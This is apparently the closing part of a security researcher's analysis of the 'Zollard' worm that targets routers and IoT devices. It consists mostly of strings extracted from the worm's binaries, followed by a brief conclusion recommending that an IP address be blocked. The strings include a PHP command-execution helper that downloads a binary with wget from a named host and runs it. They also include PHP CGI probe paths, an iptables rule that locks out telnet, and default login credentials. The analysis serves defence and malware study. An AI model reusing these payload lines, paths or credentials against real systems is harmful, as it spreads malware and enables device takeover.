/var/sp.arm_v5t
/var/sp.arm_v6k
/var/t2.arm_v6k
/var/readme
/var/b/b3.arm_v5t
/var/b/b3.arm_v6k
/var/b/b3.mips
/var/b/b3.ramips
/var/b/b3.rtl
/var/b/readme
/var/b/0.run
/var/b/1.run
/var/b/idhash
/dav/0.run
/dav/1.run
/dav/b3.arm_v5t
/dav/b3.arm_v6k
/dav/b3.mips
/dav/b3.rtl
/dav/idhash
/dav/readme
/var/b
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment

/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/tmp/ep2.mips
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mips
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.reginfo
.text
.rodata
.data.rel.ro
.data
.got
.sbss
.bss
.comment
.mdebug.abi32
.pdr
Strings from 'arm' file
Strings from 'mips' file

/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
ep2.mips
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/tmp/ep2.mips
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m
GYvh
QdV[3
y8G9
lQ\a< >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.reginfo
.text
.rodata
.data.rel.ro
.data
.got
.sbss
.bss
.comment
.mdebug.abi32
.pdr
/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
ep2.ppc
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mips
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m
GYvh
QdV[3
y8G9
lQ\a< >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.sbss
.bss
.comment
Strings from 'mipsel' file
Strings from 'ppc' file
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
nodes
/bin/sh
GET / HTTP/1.1
Host:
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
root
1234
12345
dreambox
smcadmin
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment
Strings from 'x86' file

So who is "Zollard"?  What is the relationship between the scanned targets and the original scanner?
There is a good deal more research to be done on this malware, as well as the hosting infrastructure supporting these exploit attempts.  At this point, we believe that the malware hosting location is a compromised host, and is not part of this campaign.

We recommend the blocking of IP address 78.39.232.113 and ensuring that all Internet facing devices, yes "devices" are strongly secured.